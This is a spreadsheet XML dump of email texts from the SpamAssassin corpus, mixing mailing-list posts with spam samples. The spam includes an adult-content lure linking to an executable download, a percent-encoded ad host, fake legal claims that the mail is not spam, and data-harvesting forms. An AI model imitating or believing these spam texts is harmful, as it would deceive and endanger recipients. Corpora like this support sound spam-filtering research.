 &lt;/ul&gt;&lt;/font&gt;&lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzIPycvY4HtR-pp7us2Qf9R" &gt;Digital vs. analog camcorders&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Getting ready for that long summer vacation in Tahiti? Want to buy a camcorder and capture the whole thing on videotape? When you need buying advice, what better place to turn than to the forums? You'll always find someone there with advice that'll make your experience a little easier. In this thread, a member wondered what type of camcorder would be the best for his needs, digital or analog. If you're in the market for a new camcorder or already have one and can offer some tips, take a look at this discussion and add your voice. &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIIbyDh1gmKNXLTSyPWc3uR" &gt;More Consumer Electronic &amp; Digital Camera discussions&lt;/a&gt;
 &lt;/font&gt;&lt;p&gt;
 &lt;!-- Simple Question with Simple Answers--&gt;
 &lt;a name="SimpleQuestionswSimpleAnswers"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_qa.gif" width="290" height="19" border="0" alt="Simple Questions w/Simple Answers"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt; &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=4b-k_l7IBUWWWM83sWP9VA35c54JMlR" &gt;&lt;b&gt;Where's ScanDisk for Windows XP?&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=60-oqItIsE3hThCnYGLN8S_eSgFWV4R" &gt;&lt;b&gt;Now that Audiogalaxy has gone, what next?&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=75-whwtIKU3zF7G8oK_rjups7LLZ5eR" &gt;&lt;b&gt;Brand-new memory is missing/disappearing!&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;!-- Help your fellow Boarders --&gt;
 &lt;a name="HelpyourfellowBoarders"&gt;&lt;/a&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=410&gt;
 	&lt;tr valign=bottom&gt;
 		&lt;td width=75&gt;&lt;img src="http://www.cnet.com/i/nl/mb/sub_hp.gif" width="290" height="19" border="0" alt="Help your fellow Boarders"&gt;&lt;br&gt;&lt;/td&gt;
 		&lt;td width=335&gt;&lt;font face="arial, helvetica" size="-1" color="#660000"&gt;&lt;b&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2 bgcolor="#cccccc"&gt;&lt;img src="/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="100%" cellpadding=4 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=8a-3y3dQXnM4BqAJjoO3Nt-tKChBwsR" &gt;&lt;b&gt;Should I convert to Windows XP?&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;from Melinda Douch&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;font face="arial, helvetica" color="#660000"&gt;&lt;b&gt;&lt;li&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JMEHZt86DYlcGhVIlcU_ZR" &gt;&lt;b&gt;Cannot forward pictures in e-mail&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;from Mariann Eppolito&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td align=right&gt;&lt;li&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#333333"&gt;&lt;a href="http://clickthru.online.com/Click?q=b5-50FcQ7Uq5NyUB_91PHq15ZNEEZuR" &gt;&lt;b&gt;A bunch of drive problems&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;from Darren Harris&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;!-- saved from url=(0101)file://\\Cnet2\marketing\Cartel\Inventory%20Hub\NL%20Bricks--Elsewhere\CNET\NLHorizontal_2.18.02.html --&gt;
 &lt;!--Horizontal Brick--&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://home.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 
 NOSEND="1"&gt; &lt;IMG border=0 height=8 src="http://home.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt; 
 &lt;TABLE cellSpacing=0 cellPadding=0 width="100%" border=0&gt;
   &lt;TBODY&gt;
   &lt;TR vAlign=top&gt;
     &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
       &lt;UL&gt;
         &lt;LI&gt;&lt;A 
         href="http://www.tech24.com/cnet.asp?tag=st.nl.horizontal.xpro-txt.ba_th"&gt;Live Tech Help. Submit your question now.&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://news.com.com/1200-1120-933954.html?tag=st.nl.horizontal.xpro-txt.newsvision"&gt;CNET News.com: Top CIOs on the future of IT.&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/techjobs/0-7067.html?tag=st.nl.horizontal.xpro-txt.tj"&gt;Find a job you love. Over 1 million postings&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://www.cnet.com/go/to?tag=st.nl.horizontal.xpro-txt&amp;destURL=http://techupdate.zdnet.com/techupdate/stories/main/0,14179,2868051,00.html"&gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; &lt;LI&gt;&lt;A 
         href="http://electronics.cnet.com/electronics/0-9400734-1304-8810525.html?tag=st.nl.horizontal.xpro-txt.ba_ed"&gt;May Editors" Choice Award: Pioneer"s Home Theater System HTS - 910DV&lt;/A&gt; 
 &lt;/LI&gt;&lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/P&gt;
   &lt;!-- End Horizontal Brick--&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;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HREF='http://clickthru.online.com/Click?q=ca-icPurXg7C8Y-yTW-l1KogQlfhTfmldRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@spamassassin.taint.org&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLETx2T2E9EfbQq-Kh1XhaZR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0sDS-MvlKvuUJ5QddfWmTdR"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href="http://clickthru.online.com/Click?q=09-joDSIj8jskcuYs8LYSS7ZMgtY8cR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jPx9GNRtPqEsB8LE27qdRR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjcJoLugUgz6yClxb-7XsFR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBwVs6qDN_Xl_kj2ZBSJu4R" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0i96npzeshsnStcVTQzciR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBB9P5lTviqT8UEE0WNrUZlR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e430&amp;ISSUE=2002-07-18" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=88-ecGP-fKmi5OeGT-qQXN9j6TAUdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">HI,  zzzz@example.com   today,
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Ink Price&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html;"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff"&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="365" align="center"&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;a href="http://www.inkprice.net/ink"&gt;&lt;img name="smallad1_r1_c1" src="http://www.%43%4f%6d%6f-%56e%6e%44%45%52.com/ink/ad/smallad1_r1_c1.jpg" width="365" height="94" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td&gt;&lt;a href="http://www.inkprice.net/ink"&gt;&lt;img name="smallad1_r2_c1" src="http://www.%43%4f%6d%6f-%56e%6e%44%45%52.com/ink/ad/smallad1_r2_c1.jpg" width="365" height="86" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p align="center"&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;________________________________________________________________________________________&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;font size="1" face="Arial, Helvetica, sans-serif"&gt;If you would 
   not like to get more spacial offers from us, please &lt;a href="http://www.inkprice.net/remove/remove.htm"&gt;CLICK 
   HERE&lt;/a&gt; and you request will be honored immediately!&lt;/font&gt;&lt;font size="2" face="Arial, Helvetica, sans-serif"&gt;&lt;br&gt;
   ________________________________________________________________________________________&lt;/font&gt;&lt;/p&gt;
 &lt;p align="center"&gt; &lt;/p&gt;
 &lt;p align="center"&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 egfbehkrtejpgtuyveahpeibbraqstvnwa
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hey wassup, Remember me ;)
</t>
  </si>
  <si>
    <t xml:space="preserve">Below is the result of your feedback form.  It was submitted by
  (Pamela@Blinkese.com) on Thursday, July 25, 2002 at 10:49:57
 ---------------------------------------------------------------------------
 : &lt;font size=5&gt;&lt;br&gt;&lt;br&gt;&lt;a href="http://pluginaccess.com/?w=edog&amp;type=exe"&gt;CLICK HERE FOR SOME OF THE BEST AND NASTIEST XXX ON THE NET! YOU DONT EVEN NEED A CREDIT CARD!&lt;/a&gt;
 ---------------------------------------------------------------------------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</si>
  <si>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Make sure you rebuild as root and you're in the directory that you
 downloaded the file.  Also it might complain of a few dependencies but
 you can get these at freshrpms.net, except for gcc3, which you can find
 on your Red Hat cd, Red Hat ftp, or rpmfind.net.
 After you rebuild the source rpm it should install a binary rpm in
 /usr/src/redhat/RPMS/i386.  With all dependencies met, install mplayer
 with 'rpm -ivh mplayer-20020106-fr1.rpm' and you should be good to go.
 One last thing, you will need the win32 codecs, I found them on google,
 create a directory /usr/lib/win32 and place the codecs in there.
 Good Luck!
 Lance
 On Thu, 2002-01-31 at 23:44, rob bains wrote:
 &gt;     
 &gt;  Hello,
 &gt;    
 &gt;          I just installed redhat 7.2 and I think I have everything 
 &gt; working properly.  Anyway I want to install mplayer because I heard it 
 &gt; can play quicktime movs.  I apt-get source mplayer and dl'd it to 
 &gt; /usr/src. 
 &gt; 
 &gt;          I tried to just rpm --rebuild mplayer-20020106-fr1.src.rpm, 
 &gt; then I get ; mplayer-20020106-fr1.src.rpm: No such file or directory.
 &gt; 
 &gt;          Any help or a link to some document would be appreciated, Thanks
 &gt; -rob
 &gt;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</si>
  <si>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Subject: Re: [IIU] OCTR unlicensed band changes ...
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Does that mean that you could reach further, but you couldn't take up as 
 much bandwidth then?
 a.
 At 04:27 PM 7/26/2002 +0100, Bernie Goldbach wrote:
 &gt;Hi,
 &gt;
 &gt;I believe the higher allowance nationally comes with a prescribed specific 
 &gt;frequency constraint, so if you want 2 watts, you will have to confine 
 &gt;yourself to a tighter limit of the open spectrum. That could affect 
 &gt;deployments that channel-hop when they encounter degradations in signal 
 &gt;strength.
 &gt;
 &gt;regards
 &gt;Bernie Goldbach
 &gt;::talking to signs::
 &gt;
 &gt;
 &gt;_______________________________________________
 &gt;IIU mailing list
 &gt;IIU@iiu.taint.org
 &gt;http://iiu.taint.org/mailman/listinfo/iiu
 --
 Antoin O Lachtnain
 **  antoin@eire.com ** http://www.eire.com ** +353-87-240-6691
 _______________________________________________
 IIU mailing list
 IIU@iiu.taint.org
 http://iiu.taint.org/mailman/listinfo/iiu
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Pay nothing for your conference calls!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Take Control Of Your Conference Calls&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#FFFFFF leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DTimes, New Roman&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#000066 size=3D6&gt;Crystal Clear  
       Conference Calls&lt;BR&gt;Only &lt;U&gt;18 Cents&lt;/U&gt; Per Minute!&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#666600 size=3D5&gt;&lt;B&gt;(Anytime/Anywhere)&lt;/B&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT color=3D#000066 size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;No setup fees 
       &lt;LI&gt;No contracts or monthly fees 
       &lt;LI&gt;Call anytime, from anywhere, to anywhere 
       &lt;LI&gt;Connects up to 100 Participants 
       &lt;LI&gt;International Dial In 18 cents per minute
       &lt;LI&gt;Simplicity in set up and administration 
       &lt;LI&gt;Operator Help available 24/7 &lt;/B&gt;&lt;/FONT&gt;&lt;/LI&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;=
 /TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D500 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#666600 size=3D60&gt;&lt;B&gt;&lt;FONT size=3D5&gt;G=
 et the best 
       quality, the easiest to use, and lowest rate in the 
       industry.&lt;/B&gt;&lt;/FONT&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;
 &lt;TABLE width=3D400 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;FONT color=3D#000066 size=3D4&gt;If you like saving m=
 oney, fill 
       out the form below and one of our consultants will contact 
   you.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#000066 size=3D2&gt;Required Input Field&lt;FONT color=3D#66660=
 0 
 size=3D2&gt;*&lt;/FONT&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE cellSpacing=3D0 borderColorDark=3D#333300 cellPadding=3D3 width=3D6=
 00 
 borderColorLight=3D#ffffcc&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;
       &lt;FORM action=3Dmailto:inbocks2_6@yahoo.com?subject=3DConference_Inqu=
 iry 
       method=3Dpost encType=3Dtext/plain&gt;
       &lt;TABLE width=3D"100%"&gt;
         &lt;TBODY&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066
           size=3D2&gt;Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DNAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Web 
             Address&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT value=3Dhttp:// name=3DURL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Type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face=3D"Arial, Helvetica, sans-serif"&gt;&lt;font c=
 olor=3D#666600
       size=3D1&gt;To be removed from our list, please  
       &lt;A href=3D"mailto:d_lete179@eudoramail.com?subject=3DRemove_Conferen=
 cing"&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Lawrence Murphy wrote:
 &gt;&gt;&gt;&gt;&gt;&gt;"R" == R A Hettinga &lt;rah@shipwright.com&gt; writes:
 &gt;&gt;&gt;&gt;&gt;&gt;            
 &gt;&gt;&gt;&gt;&gt;&gt;
 &gt;
 &gt;    R&gt; At 9:34 PM -0700 on 9/20/02, Mr. FoRK wrote:
 &gt;    &gt;&gt; "Free trade and free markets have proven their ability to lift
 &gt;    &gt;&gt; whole societies out of poverty" I'm not a
 &gt;    &gt;&gt; socio-political/history buff - does anybody have some clear
 &gt;    &gt;&gt; examples?
 &gt;
 &gt;    R&gt; You're probably living in one, or you wouldn't be able to post
 &gt;    R&gt; here.
 &gt;
 &gt;Cool --- I wasn't aware that the US had lifted it's population out of
 &gt;poverty!  When did this happen?  I wonder where the media gets the
 &gt;idea that the wealth gap is widening and deepening...
 &gt;
 &gt;
 &gt;  
 &gt;
 I wasn't aware that there was anyone who could use the words "free 
 trade" about the United States and keep a straight face.
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Rights Fight
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.aaronsw.com/weblog/000614
 Date: 2002-09-24T11:03:09-06:00
 I need a lawyer willing to argue that not-for-profit file sharing is fair use. 
 I've got a plan. 
 Napster: Work in Progress[1] -- that's new. They're also selling merchandise. 
 MP3 Is Not a Crime[2] is a weblog covering the attacks on our rights. 
 Dave Winer says he's not afraid to defend our rights[3]. _Yes! Who else?_ 
 I will now refer to file sharing networks as "fair use networks"
 like my limewire fair use network client.. or the kazaa fair use network..
 [1] http://www.napster.com/
 [2] http://www.mp3isnotacrime.org/
 [3] http://scriptingnews.userland.com/backissues/2002/09/24#When:8:35:25AM
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Slim Factors - A totally new approach to weight loss
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Slim Factors&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;style type="text/css"&gt;
 &lt;!--
 .t {  font-family: "Times New Roman", Times, serif; font-size: 12px; color: #000000}
 --&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;table width="556" border="0" cellspacing="0" cellpadding="0" align="center"&gt;
   &lt;tr&gt; 
     &lt;td colspan="3"&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/a.jpg" width="556" height="76"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/b.jpg" width="150" height="165"&gt;&lt;/td&gt;
     &lt;td&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/c.jpg" width="161" height="165"&gt;&lt;/td&gt;
     &lt;td&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/d.jpg" width="245" height="165"&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td colspan="2"&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/e.jpg" width="311" height="125" usemap="#Map" border="0"&gt;&lt;map name="Map"&gt;&lt;area shape="rect" coords="4,61,108,121" href="http://global.zenmarketing.net/s_link.php?nURL=http://www.slimfactors.net&amp;email=zzzz@example.com" alt="Slim Factors - A totally new approach to weight loss" title="Slim Factors - A totally new approach to weight loss"&gt;&lt;/map&gt;&lt;/td&gt;
     &lt;td&gt;&lt;a href="http://global.zenmarketing.net/s_link.php?nURL=http://immunetree.com/showprod.php?ID=6&amp;email=zzzz@example.com"&gt;&lt;img src="http://global.zenmarketing.net/c/images/slim/f.jpg" width="245" height="125" alt="Buy Slim Factors Now" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt; 
     &lt;td colspan="3"&gt;&amp;nbsp;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td colspan="3" class="t"&gt;This e-mail is intended to be a benefit to the recipient. 
       If you would like to opt-out and not receive any more &lt;a href="http://global.zenmarketing.net/unsub.php?email=zzzz@example.com&amp;name=Friend"&gt;click 
       here&lt;/a&gt;. Your address will be removed immediately. We sincerely apologize 
       for any inconvenience. This E-mail is not SPAM under the Federal Regulatory 
       laws of the United States. This message is being sent to you in compliance 
       with the proposed Federal Legislation for commercial e-mail (H.R.4176-SECTION 
       101 PARAGRAPH (e) (1) (A)) and Bill s.1618 TITLE III passed by the 105th 
       US Congress. This message is not intended for residents of WA, NV, CA, VA. 
       Screening of addresses has been done to the best of our technical ability. 
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: WORK FROM HOME. FREE DETAILS.
</t>
  </si>
  <si>
    <t xml:space="preserve">WE NEED HELP.  We are a 14 year old fortune 500 company, and we have 
 grown 1000%!  We cannot keep up.  We are looking for individuals who 
 want to work at home, and make a good living.
 So if you are looking to be employed from home with a career that has
 vast opportunities, then go:
 http://www.lotsonet.com/opportunity
 and fill out our info form.  NO EXPERIENCE REQUIRED, WE WILL TRAIN YOU.
 NO COMMITTMENT IS REQUIRED BY FILLING OUT THE FORM, IT IS FOR INFO
 ONLY.
 http://www.lotsonet.com/opportunity
 You want to be independent?  THEN MAKE IT HAPPEN!
 HAPPEN!
 SIMPLY CLICK ON THE LINK BELOW FOR FREE, NO OBLIGATED INFORMATION!
 GUARANTEED!
 http://www.lotsonet.com/opportunity
 To be removed from our link simple go to:
 http://www.lotsonet.com/opportunity/remove.html
 7773yeFu0-048lhUU4192RRTa7-528LHHZ5390OFtY1-426ZJrY6257XgnL8-712daCw9024eVzQ8-819Sl77
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] Alternatives to the GA
</t>
  </si>
  <si>
    <t xml:space="preserve">BTW Ken Shan suggested making a set of corpus data publically available,
 so that different classification algos can be tried out.
 I'd be happy to do that -- providing the nonspam.log and spam.log files
 from my mass-check output (ie. the "matrix of test results" in Ken's
 terms).  Along with the default scores, this is the entire input data set
 for the SpamAssassin GA system.
 So, if anyone wants a go, contact me by mail.
 --j.
 -- 
 'Justin Mason' =&gt; { url =&gt; http://jmason.org/ , blog =&gt; http://taint.org/ }
 -------------------------------------------------------
